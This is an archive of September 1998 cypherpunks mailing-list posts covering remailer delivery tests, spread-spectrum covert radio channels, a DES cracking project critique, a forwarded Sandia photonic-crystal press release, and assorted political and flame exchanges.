> 17 crimes over the past 10 years have been made more difficult
> for the FBI by encryption.
>
> What the FBI Director won't tell you is that the Cubans have
> been sending enciphered messages to their U.N. mission in New
> York over SHORT-WAVE RADIO for almost 30 years.  The Morse code
> signals are encrypted with a Cuban one-time-pad cipher and
> transmitted from Havana on a nightly basis.  The Cuban encrypted
> transmissions are so regular - some HAM radio operators set
> their clocks by it.

-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Tue, 15 Sep 1998 15:21:49 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Forwarded mail...
Message-ID: <199809152046.PAA00429@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 15 Sep 1998 21:14:19 +0200
> From: Anonymous <nobody@replay.com>

> The post I made earlier went through without a problem, but as I mentioned in my original post I had made several anon posts through replay.com to cypherpunks@ssz.com and they never made it to the list.
> 
> I also noticed that replay.com seems to be striping the subject from the posts as in my last post I *did* put a subject line on the message but it arrived to the list without one.
> 
> In the messages I sent, a couple of them I used a chain of remailers but when they failed to appear I sent the remaining messages through replay.com only (using the https interface to send the messages).
> 
> It may have just been a problem on replay's end but on all the posts I did get a conformation page that the messages had been accepted.
> 
> Odd.
> 
> I AM TOTOCUS!!!
> 

Sounds to me like you need to be talking to replay.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian B. Riley" <brianbr@together.net>
Date: Tue, 15 Sep 1998 15:28:24 +0800
To: "Steve Schear" <schear@lvcm.com>
Subject: Re: radio net
Message-ID: <199809152029.QAA03672@mx02.together.net>
MIME-Version: 1.0
Content-Type: text/plain



On 9/6/98 6:20 PM, Steve Schear (schear@lvcm.com)  passed this wisdom:

>> Spread spectrum would have more promise as many stations could be on the
>>air at once on the same frequency thus making life quite confusing for
>>the T-hunters.
>
>I investigated this application several years back and see two practical
>approaches: one adapt a commercial SSB or Ham transciever to use frequency
>hopping spread spectrum, or two build a pirate spread spectrum satellite
>ground station.
>
>Until recently most SSB gear didn't have the RF characteristics to use FH.
>Now there are a number of inexpensive sets which use direct frequency
>synthesis (as opposed to the older, and much slower, phase-locked loop
>approach) and can be driven at hundreds or even thousands of hops per
>second. FH helps solve two problems: first it provides privacy, second it
>can mitigate or eliminate fading (which is highly time-frequency
>correlated). Also, the higher the hop rate, the higher the process gain,
>jam resistance and the lower the probablity of intecept (all other things
>being equal).
>
>It think it was Phil Karn (Qualcomm) who once mused that it would be rather
>straightforward to masquarade a high process gain SS signal on a commercial
>satellite transponder. To it's owners the SS signal would be almost
>invisible, making itself known as only a very slight depression in the
>transponder's gain. Effectively, this could offer an inexpensive covert
>channel for tunneling packets and thwarting traffic analysis.
>
>After the Captain Midnight episode I discussed this possibility with a very
>technically knowledgeable staffer at the FCC and was assured that discovery
>of such signals were beyond (at that time) the ability of commercial and
>national technical (e.g., Lacrosse) means.

 I would suppose the T-hunt aspects of a clandestine network would be 
obviated by piggybacking it into a commercial satellite transponder 
channels ... which brings to mind about how expensive one or two of those 
channeles might be. I remeber in the early days of ham packet radio we 
had several 'wormholes' where hams had obtained through their places of 
employemnt temporary use of unused satellite channels where we were given 
essentially RS232 access and we adapted the packet switches to an async 
backchannel in place of another synch RF path. They did make for some 
intersting network improvements. I guess it always comes down to how do 
you fund such things.


Brian B. Riley --> http://members.macconnect.com/~brianbr
 For PGP Keys  <mailto:brianbr@together.net?subject=Get%20PGP%20Key>

"Success always occurs in private, and failure in full view." 
   -- from somewhere on the Net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Tue, 15 Sep 1998 18:40:44 +0800
To: Michael Branch <Michael.Branch@Central.Sun.COM>
Subject: Re: Larry Gilbert, AOLers, and the Hyper-real flamer
In-Reply-To: <199809152110.PAA04927@breckenridge.Central.Sun.COM>
Message-ID: <35FEFB86.6E10@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



Michael Branch wrote:
> 
> this news group is a lot like the Jerry Springer show.
> 
> Mike
> 
I went to a cypherpunks meeting in Mtn View last Saturday. I was
hesitant because I expected a multimedia, in-your-face version of the
list. Surprise!!! This crew is smart, experienced, rational and they are
actually working. Even though the topic of the day, IPSEC and secure
DNS, is not a technical area that I know or care to learn right now, I
was impressed. 

Night and day : list and meeting. When a project comes along that
interests me, I'm in. 

Regards,
Mike

ps - I wish I could offer legal expertise or lots of money *when* the
Constitutional battle over domestic controls gets more direct.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Tue, 15 Sep 1998 18:53:18 +0800
To: Vivek Vaidya <phirebearer@hotmail.com>
Subject: Re: Democracy...
In-Reply-To: <19980915210638.14549.qmail@hotmail.com>
Message-ID: <35FEFCC9.2027@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



Vivek Vaidya wrote:
> Ever heard of seperation of church and state? Democracy? the rights of
> the individual?  While you certainly have the right to practice your
> religion in what ever manner you so choose demanding that everyone > else
> does, or that the president of the us of ais subject to you PERSONAL
> faith decisions is outragous
> 
> Vivek Vaidya
> 
Just look around the world to see what happens when those two get
together!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 15 Sep 1998 09:59:32 +0800
To: cypherpunks@cyberpass.net
Subject: Re: The DES Analytic Crack Project
Message-ID: <199809151500.RAA31305@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Eric Michael Cordian, emc@wire.insync.net, writes:

> The concerns are generally that
> we will experience an unexpected "combinatoric explosion" in the
> higher round problems

Unexpected by you, perhaps, but expected by everyone else.  The complexity
of the expressions should increase exponentially with the number of
rounds.  Extrapolating from two and four round results to eight and
sixteen is the wrong model.  (You can artificially suppress this by
introducing new variables for each round, but that doesn't change the
underlying complexity of the problem.)

Can't you come up with a back-of-the-envelope estimate for the number of
terms in your sixteen round expression?  Even without fully optimized
S-box expressions this information would be useful.  If it is greater than
the number of atoms on Earth then it would be a strong hint that this
approach won't work.

If you really want to attract money you need some kind of numbers to show
that the approach has a prayer of working.  Show the size of the problem
you will get, estimate how much improvement you'll get with your improved
S-box representations, compare it with the problems tackled by available
combinatorial algorithms.  You should be able to do this with a few hours
of work, at least to show that the basic concept is sound (or unsound).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "XxGaLxX" <XxGalxX@concentric.net>
Date: Tue, 15 Sep 1998 17:55:39 +0800
To: "Christopher Barkley" <cypherpunks@toad.com>
Subject: Re: Hello
Message-ID: <199809152249.SAA01925@mcfeely.concentric.net>
MIME-Version: 1.0
Content-Type: text/plain



your worst nightmare =)

----------
> From: Christopher Barkley <christopher.barkley@srcm.com>
> To: cypherpunks@toad.com
> Subject: Hello
> Date: Tuesday, September 15, 1998 5:14 PM
> 
> You listed me in Six Degrees as your fellow alum, but I'm afraid I can't
> place you.  So, who are you?
> 
> Cheers,
> Christopher




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 15 Sep 1998 16:54:16 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Working Photonic Lattice, A Dream For A Decade, Fabricated At  Sandia
Message-ID: <v04011702b22491ee1cf7@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Delivered-To: ignition-point@majordomo.pobox.com
X-Sender: believer@telepath.com
Date: Tue, 15 Sep 1998 16:16:20 -0500
To: believer@telepath.com
From: believer@telepath.com
Subject: IP: Working Photonic Lattice, A Dream For A Decade, Fabricated At
  Sandia
Mime-Version: 1.0
Sender: owner-ignition-point@majordomo.pobox.com
Precedence: list
Reply-To: believer@telepath.com

Source:  EurekAlert!
http://www.eurekalert.org/releases/snl-wpladfad.html

For Immediate Release: 15 September 1998

 Contact: Neal Singer
 nsinger@sandia.gov
 (505) 845-7078
 Sandia National Laboratories

Working Photonic Lattice, A Dream For A Decade, Fabricated At Sandia:
Lincoln Log-Like Structure To Improve Infrared And Optical Communications,
Optical Computers

 ALBUQUERQUE, N.M. -- By interlocking tiny slivers of silicon into a
lattice that,
 under a microscope, appears to be formed by toy Lincoln logs, scientists
at the
 Department of Energy's Sandia National Laboratories believe they have
solved a
 major technical problem: how to bend light easily and cheaply without
leaking it, no
 matter how many twists or turns are needed for optical communications or
(potentially)
 optical computers.

 The lattice, dubbed a photonic crystal (crystals have regularly repeating
internal
 structures), now works in the infrared range (approximately 10-micron
wavelengths).
 This achievement is of military and commercial interest because the
technique can be
 used to enhance or better transmit infrared images. Sandia researchers
Shawn Lin and
 Jim Fleming now are preparing a 1.5 micron crystal -- the region in which
almost all
 the world?s optically transmitted information is passed.

 The improvement -- which bends far more light in far less space at
considerably less
 cost than current commercial methods -- will make possible tinier,
cheaper, more
 effective waveguides to combine or separate optical frequencies at the
beginning or
 end of information transmissions. It will find wide application in data
transmission and
 in more compact and efficient sensors. (See "Technique Perfected...."
backgrounder
 that follows.)

 Pierre Villeneuve, a research scientist at the Massachusetts Institute of
Technology
 (MIT), says, "With the structure [Sandia researcher] Shawn [Lin] is using
now, he'll be
 able to hit the 1.5 micron mark within the next 12 months. This shows how
'key' this
 work is: He's using a technique that lends itself to hitting the mark."

 A venture capitalist requesting anonymity has approached the researchers to
 commercialize the process. The achievement, for which Sandia has applied
for a
 patent, was reported in the July 16 issue of the journal Nature.

 The structure, in the regularity and spacing of its parts, is mirrorlike
in not permitting
 light of a particular frequency, caught within the cavity of the
structure, to escape.
 Instead, light must follow along any twists or turns designed into the log
structure.

 By designing the distance between logs carefully, a chosen wavelength is
reflected
 instead of passing out of the space, as longer or shorter wavelengths can.
With
 introduction of an impurity like air or much thicker polysilicon "logs" to
provide routes
 for preselected wavelengths introduced into the crystal, light travels
along the impurity
 as it twists or bends. No matter how sharp the turns, light of frequency
roughly in the
 middle of the band gap cannot escape.

 Funding for the project was provided by Sandia's Laboratory-Directed
Research and
 Development office, which funds speculative, defense-related research, and
by the
 DOE.

 A Photonic Band Gap

 What's "cool," in the eyes of some observers, is that Sandia researchers
Lin and
 Fleming have created the equivalent of a photonic "band gap" that forbids
certain
 frequencies of light from exiting the lattice. ("Band Gap" is a term
usually applied to
 electrons, not photons, and signifies a range of energies in which
electrons are absent
 because their presence would contradict quantum mechanical laws.)

 The nearly leak-proof lattices form a cage that trap and guide
approximately 95
 percent of the light sent within them, as compared with approximately 30
percent for
 conventional waveguides, and they take only one-tenth to one-fifth the
space to bend
 the light. (The Sandia photonic lattice's turning radius is currently in
the one-wavelength
 range, rather than the traditional waveguide bend of more than 10
wavelengths.)

 Standard, integrated-circuit manufacturing technology used to fabricate
micromachines
 -- machines nearly too small to see -- at Sandia's Microelctronics
Development
 Laboratory can create tens of thousands of waveguides from a single,
6-inch silicon
 wafer. This is a factor 10 to 100 times more dense than can be fabricated
using more
 expensive gallium arsenide with current commercial technology.

 Potential uses: low-energy lasers, photonic computers, communications
Because little
 light is lost in the three-dimensional mirroring that sends light back at
itself, a new type
 of microlaser requiring little start-up energy is theoretically
achievable. (Most
 conventional lasers require large jolts of energy to begin operating
because so much
 light is lost in the lasing start-up process.)

 The achievement also brings nearer the day when computers that transmit
information
 using photons rather than electrons become a practical reality. Currently,
desktop
 computers use electrons to pass information, but as more circuits are
included on new
 chips, they become more difficult to cool. Photons, the stuff of light,
are faster and
 cooler than electrons. The problem is that no one has been able to bend
useful
 frequencies of light around tight corners (as navigated by electrons
through a million
 turns on a computer chip the size of a postage stamp) without incurring
large losses in
 information; with previously used techniques, light leaks, and badly, the
more tightly it
 is turned.

 One principle of optical communications is that differing frequencies of
light are bent by
 different amounts. Waveguides first combine the frequencies of a number of
 information streams -- for example, telephone calls -- by bending them
into the
 combined "white" light passing through an optical cable; then other
waveguides
 separate the light into component frequencies by bending it at the end of
its journey.

 Photonic Band Gap Crystals -- A History

 The idea of a "photonic band gap structure" was first advanced in 1987 by Eli
 Yablonovitch, now a professor at the University of California at Los
Angeles. In 1990,
 he built the first photonic crystal, baseball-sized to channel microwaves
useful in
 antennae applications. In the mid 1990s, scientists at Ames Laboratory in
Iowa built
 crystals the size of ping pong balls, also for microwaves. The components
were of a
 size that could be put together by hand, using straight metal pins (of the
type that hold
 new shirts in place).

 The size reduction for current structures is a striking achievement that
researchers have
 been attempting to achieve for a decade, says Del Owyoung, Sandia manager
for the
 project. The difference in frequency is comparable to moving from masers
to lasers, he
 said ? from microwaves to optical waves.

 According to Rama Biswa, a researcher at Ames Lab, "We had built the same
 structure [as Sandia has] ourselves, but more than 100 times larger, in
the microwave
 frequency range. I think it is quite remarkable that Shawn Lin's group
could do it at
 these wavelengths in the infrared and at this size."

 Villeneuve, who has theorized about uses for photonic crystals for much of
the 1990s
 in a group led by MIT professor J. D. Joannopoulos, praised the Sandia
group for
 "showing that what we're doing is valid," he says. "[People would say,]
'It's wonderful
 that you're coming out with all these great devices [that make use of
photonic crystals],
 but your building block doesn't even exist!'" That is no longer the case.

 Sandia is a multiprogram DOE laboratory, operated by a subsidiary of Lockheed
 Martin Corp. With main facilities in Albuquerque, N.M., and Livermore,
Calif., Sandia
 has major research and development responsibilities in national security,
energy, and
 environmental technologies.

###

 BACKGROUND: Technique Perfected In Building Surface-Etched
 Micromachines

 Shawn Lin and Jim Fleming achieved the desired crystalline spacing using
techniques
 perfected in building surface-etched micromachines, at which Sandia is a
world leader.

 Gears that spin require spaces between parts; specifically, a silicon base
is covered
 with an expendable coating in which a part can be etched, and then the
expendable
 portion is removed by chemical and mechanical means, leaving the gear or axle
 unencumbered by surrounding material and thus able to spin freely
 [www.mdl.sandia.gov/micromachines].

 Using a variant on the same technique, Fleming made an artificial crystal
lattice. He
 took a silicon wafer, coated it with silicon dioxide, cut trenches into
the silicon dioxide
 and then bathed the chip in polysilicon till it filled the trenches. Then
he polished the
 surface until smooth and bathed the chip in another layer of silicon
dioxide, into which
 he cut the same number of trenches as before, but so they lay across the
trenches
 beneath them at right angles, and then filled these trenches with
polysilicon.

 After repeating this process a number of time, Jim removed the silicon
dioxide, using
 hydrofluoric acid, and got "micron layers of Lincoln logs, orthogonal to
each other, and
 joined where they touch."

 Center to center, the polysilicon logs were 1.2 microns wide, 1.5 microns
high, with a
 pitch of 4.8 microns -- child's play to achieve in the world of silicon
micromachines.
 The proportions were identical to that specified by Ames Laboratory and
Iowa State
 researchers as those necessary to make the photonic equivalent of an
electronic band
 gap.

 Media Contact:

Neal Singer
nsinger@sandia.gov
(505) 845-7078

 Technical Contact :

Shawn Lin
slin@sandia.gov
(505) 844-8097

Jim Fleming
fleminjg@sandia.gov
(505) 844-9158

Del Owyoung
aowyoun@sandia.gov
(505) 884-5481
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------






**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christopher Barkley <christopher.barkley@srcm.com>
Date: Tue, 15 Sep 1998 17:22:18 +0800
To: cypherpunks@toad.com
Subject: Hello
Message-ID: <35FEE6CF.6FC2ED7E@srcm.com>
MIME-Version: 1.0
Content-Type: text/plain



You listed me in Six Degrees as your fellow alum, but I'm afraid I can't
place you.  So, who are you?

Cheers,
Christopher




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lynne L. Harrison" <lharrison@dueprocess.com>
Date: Tue, 15 Sep 1998 17:11:36 +0800
To: "James A. Donald" <cypherpunks@Algebra.COM
Subject: Re: Clinton--Why I am Chortling
In-Reply-To: <3.0.5.32.19980914122452.0086a750@pop.mhv.net>
Message-ID: <3.0.5.32.19980915181502.00838820@pop.mhv.net>
MIME-Version: 1.0
Content-Type: text/plain



At 06:21 AM 9/15/98 -0700, James A. Donald wrote:
>
>    --
>At 12:24 PM 9/14/98 -0400, Lynne L. Harrison wrote:
>> I don't see a power imbalance here.  If a young woman in 
>> her 20's invitingly flashes her thong panties at a man, I 
>> don't see how she can be portrayed as the victim.  
>
>According to the law applied to normal people, Monica was the
>victim.

What law?  This was consensual sex.  No law was broken.  Judgment and
morality, of course, are different issues.

> Also according to the law applied to normal people,
>Clinton was required to spill his guts about all of his sex
>life, because some women sued him, whereas the women suing
>was completely protected against any questions concerning her
>sex life.

Clinton, like anyone else, is required to tell the truth when being deposed
or testifying in front of a Grand Jury, i.e., making any statement under oath.

>These laws are flagrantly unjust, but the Democrats introduced
>them and applied them.  Feminists supported and continue to
>support Clinton precisely because he supported and supports
>laws that he flagrantly broke.  If these laws are to be
>repealed for politicians, they should be repealed for normal
>people as well.

I'm not in a position to comment because I'm not sure who the major players
were at the time the legislation was enacted.  Generally speaking, when the
president belongs to Party A, the majority of the Legislature belongs to
Party B.

Regarding political parties, I am an NPA (no party affiliation) and can
only vote in general elections.  I made this choice because I do not wish
to be "pigeon-holed" by a label imposed upon me as a result of belonging to
a given political party.  In the same vein, I am unable to speak for
"feminists", "normal people", "politicians", etc.  I speak only for myself. ;)

/end of Monica-Bill thread





***************************************************************************
Lynne L. Harrison, Esq.         |  "If we are all here,
Poughkeepsie, New York          |   then we are not
mailto:lharrison@dueprocess.com |   all there."
http://www.dueprocess.com       |      - old Zen saying
*************************************************************************

DISCLAIMER:  I am not your attorney; you are not my client.
             Accordingly, the above is *NOT* legal advice.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AIMSX@aol.com
Date: Tue, 15 Sep 1998 17:54:40 +0800
To: sunder@brainlink.com
Subject: Re: Larry Gilbert, AOLers, and the Hyper-real flamer
Message-ID: <c6a5eb38.35feedbd@aol.com>
MIME-Version: 1.0
Content-Type: text/plain



Actually.. I am getting a SunOS Shell account this weekend.  AOL has improved
service somewhat, and it is now possible to use Netscape (or any other
browser) along with it.

I also have over 100 accounts on a local ISP - so trust me... it's not that
big of a deal for me to get another ISP, I just like some of the keywords and
a few other areas.

As for your thought that it is a CHOICE for everyone... well, I am sorry to
say it is not.  My parent would rather use the [semi]- user-friendly software
of AOL, which she is familiar with, than have a dialup access with browsers
and other utilities in different areas she can't find as easily.  (I know, it
sounds stupid.)

I was finally able to convince her to pay for a shell account, promising her I
would teach her how to use it.

As for me paying it... I just became old enough to work (finally) about a
month ago, and I am only making minimum wage, and the hours are not good
enough for me to be able to keep up my hobbies of paintball, computer
upgrades, and Internet alone.

Therefore... she pays for it, I wash dishes...
So anyway... before I get too sidetracked, I am just saying... I am finally
getting a shell account, and not all AOLers are stupid warez lovers that don't
know cu from cd.

I would also like to add - I wasn't even talking about AOL service (although I
agree it is really crappy - but a tad better than it used to be) I was just
talking about the insults to all AOL user's Intelligence.

I am sure there are morons on other ISP's, they are just more visible on AOL.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nnburk <nnburk@cobain.hdc.net>
Date: Tue, 15 Sep 1998 19:40:50 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Predictions: Crime and Criminal Justice in the 21st Century
In-Reply-To: <v0313030fb2236dd4cc39@[209.66.100.123]>
Message-ID: <35FF1A48.483A@yankton.com>
MIME-Version: 1.0
Content-Type: text/plain



Tim May wrote:
> 
> Good post. The war is about to be joined.
> 

Thank you. My only regret is that I do not have a source. The material was 
provided by a local LEA from an unnamed "seminar."

> At 7:34 PM -0700 9/14/98, nnburk wrote:
> >4.      Terrorist acts by "fringe"/special issue groups will
> >increase at a significant rate -- becoming a major law enforcement
> >and security problem.
> 
> Freedom fighters, not terrorists.
> 

Yes. But I suppose like beauty, this is in the eye of the beholder. The 
victor writes the history books.


> >10.     With the decrease of the possibility of major global
> >warfare, the United States military will take on an increased
> >domestic "peace-keeping" role with America's law enforcement
> >agencies.
> 
> Posse comitatus is already becoming a moot point. The Army will be
> patrolling the streets within a few years, probably coterminous with Y2K
> problems and the resulting martial law.
> 

I doubt we have long to wait. They know it's coming too.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 15 Sep 1998 12:03:37 +0800
To: cypherpunks@einstein.ssz.com
Subject: No Subject
Message-ID: <199809151705.TAA07717@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Hi,

There seems to be a problem posting anonymous messages to cypherpunks@ssz.com. I have posted several messages over the past week and *none* of them have showed up.

I am posting this as a test message. I am sending it to the following addresses:

cypherpunks@toad.com
cypherpunks@ssz.com
cypherpunks@algebra.com
cypherpunks@cyberpass.net

I will add the server name to the subject line for each post to test which messages are being delivered and which are not.

I AM TOTOCUS!!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 15 Sep 1998 12:12:32 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199809151706.TAA07763@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Hi,

There seems to be a problem posting anonymous messages to cypherpunks@ssz.com. I have posted several messages over the past week and *none* of them have showed up.

I am posting this as a test message. I am sending it to the following addresses:

cypherpunks@toad.com
cypherpunks@ssz.com
cypherpunks@algebra.com
cypherpunks@cyberpass.net

I will add the server name to the subject line for each post to test which messages are being delivered and which are not.

I AM TOTOCUS!!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 15 Sep 1998 12:05:15 +0800
To: cypherpunks@Algebra.COM
Subject: No Subject
Message-ID: <199809151706.TAA07769@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Hi,

There seems to be a problem posting anonymous messages to cypherpunks@ssz.com. I have posted several messages over the past week and *none* of them have showed up.

I am posting this as a test message. I am sending it to the following addresses:

cypherpunks@toad.com
cypherpunks@ssz.com
cypherpunks@algebra.com
cypherpunks@cyberpass.net

I will add the server name to the subject line for each post to test which messages are being delivered and which are not.

I AM TOTOCUS!!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 15 Sep 1998 12:06:04 +0800
To: cypherpunks@cyberpass.net
Subject: No Subject
Message-ID: <199809151707.TAA07821@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Hi,

There seems to be a problem posting anonymous messages to cypherpunks@ssz.com. I have posted several messages over the past week and *none* of them have showed up.

I am posting this as a test message. I am sending it to the following addresses:

cypherpunks@toad.com
cypherpunks@ssz.com
cypherpunks@algebra.com
cypherpunks@cyberpass.net

I will add the server name to the subject line for each post to test which messages are being delivered and which are not.

I AM TOTOCUS!!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Edwin E. Smith" <edsmith@IntNet.net>
Date: Tue, 15 Sep 1998 18:25:50 +0800
To: theforum@lists.execpc.com
Subject: Voices
Message-ID: <3.0.2.32.19980915190932.007fb350@mailhost.IntNet.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

One of the things I like about the internet, especially email, is 
that my voice and the voices of others are leveled. My voice can 
reach a multitude of people at least intelligent enough to get on the 
internet.

But better than that is my ability to receive the other voices is 
enhanced much more. I can hear what a lot of people hear without 
their voices being filtered by the likes of Dan Rather, Tom Brokay 
and the rest of the Liberal broadcast media. It fact is is mostly 
just limited to what I choose to listen to.

I also get to talk back to people with whom I disagree. I listen to 
their responses and sometimes modify my thinking. I also get 
affirmation of what I do believe from people of a like mind.

Occasionally I am surprised to find others who are different but also 
intelligent and very persuasive in their convictions. I revel in this 
controversy and learn much from it. I confess that sometimes I troll 
for flames to get the dialog going. If you have something to say, say 
it! Even the words of the clueless are sometimes enlightening.

To all of you who are offended by what you read or have been attacked 
and shirk away I say, stick around, learn and grow. The words which 
come to you can not hurt you if you don't let them. If you are to 
timid to endure a few flames then woe be unto you if anyone comes at 
you with actual violence on his mind.

Edwin E. Smith


-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQA/AwUBNf7zq0mNf6b56PAtEQLR+wCfQ7iXzmj5Gz9gtO09/0ogVzrpfawAoJUP
8qZqYluPFxHRt+srCM3vgXNd
=e9r4
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nnburk <nnburk@cobain.HDC.NET>
Date: Tue, 15 Sep 1998 19:42:04 +0800
To: nobody@replay.com>
Subject: Re:
In-Reply-To: <199809151707.TAA07821@replay.com>
Message-ID: <35FF1E19.7FF4@yankton.com>
MIME-Version: 1.0
Content-Type: text/plain



No shit. And not just cypherpunks@ssz.com. Wonder if it has something to 
do with our fiendly domestic surveillance post-Toto attachment.

Anonymous wrote:
> 
> Hi,
> 
> There seems to be a problem posting anonymous messages to cypherpunks@ssz.com. I have posted several messages over the past week 
and *none* of them have showed
> 
> I am posting this as a test message. I am sending it to the following addresses:
> 
> cypherpunks@toad.com
> cypherpunks@ssz.com
> cypherpunks@algebra.com
> cypherpunks@cyberpass.net
> 
> I will add the server name to the subject line for each post to test which messages are being delivered and which are not.
> 
> I AM TOTOCUS!!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Tue, 15 Sep 1998 18:51:41 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: CNN - Investigators find "assassination" page on the Web - September 15, 1998 (fwd)
Message-ID: <199809160016.TAA01658@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 16 Sep 1998 06:53:53 -0700 (PDT)
> From: Alan Olsen <alan@clueserver.org>
> Subject: CNN - Investigators find "assassination" page on the Web - September 15, 1998 (fwd)

> http://www.cnn.com/TECH/computing/9809/15/internet.hit.list.ap/index.html

How come only the IRS is listed as related web sites?...


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 15 Sep 1998 12:45:33 +0800
To: harald.fragner@idg.se
Subject: Re: Harald Fragner
Message-ID: <199809151737.TAA09935@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Of course I have issues!  That felcher Harald Fragner led me to believe
that through him, he would get me hooked up with Monica Lewinsky
through this six degrees thing!  I hear she really loves to party with
the geek-set!  That mother humper actually made me send him a
check in exchange for her private info, after which he takes me out
of his contact info!

I tell you what, it's monkey spankers like Harald Fragner that make this
six degrees service a real sham.  These toe fungus kissers need to be
taken out of six degrees!  I'm going to contact my congressman and
tell him to watch out for the likes of a camel snot taster like Harald
Fragner, if that's even his real name.  And I'm telling him to watch out
for you guys too!  You just watch it, you gerbil tubers!  You cheese
whiz fondlers!  You purveyors of cottage cheese and farm animals!
The government knows what you're up to!

Sincerely,
Joe Cypherpunk, dissatisfied customer at large


At 09:49 AM 9/15/98 -0500, sixdegrees wrote:
>Just a quick update from sixdegrees(tm). Unfortunately Harald 
>Fragner (harald@fragner.net) asked not to be listed as your 
>contact with sixdegrees.
>
>We also wanted to make sure you were aware that you currently 
>have no other confirmed contacts, so it will be hard for you to
>have a productive sixdegrees experience. As you probably know, 
>without any confirmed contacts, you won't get any results from our 
>networking searches. 
>
>So, we just wanted to recommend that you head over to 
>http://www.sixdegrees.com , log-in, and go to MY CONTACTS 
>to list additional relationships. 
>
>
>====================================================================
>PLEASE NOTE: All replies to this address are processed by a computer.
>If you have any problems, questions or requests send an e-mail to 
>issues@sixdegrees.com and someone will get back to you as soon as 
>possible.
>====================================================================
>
>
>E.DB.BRESP.3
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AIMSX@aol.com
Date: Tue, 15 Sep 1998 18:52:54 +0800
To: theforum@lists.execpc.com
Subject: Re: Voices
Message-ID: <63f52c6a.35fefb8e@aol.com>
MIME-Version: 1.0
Content-Type: text/plain



Preach on brother =)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nnburk <nnburk@cobain.HDC.NET>
Date: Tue, 15 Sep 1998 19:48:58 +0800
To: sunder@brainlink.com>
Subject: Re: Predictions: Crime and Criminal Justice in the 21st Century
In-Reply-To: <35FDD227.4C7D@yankton.com>
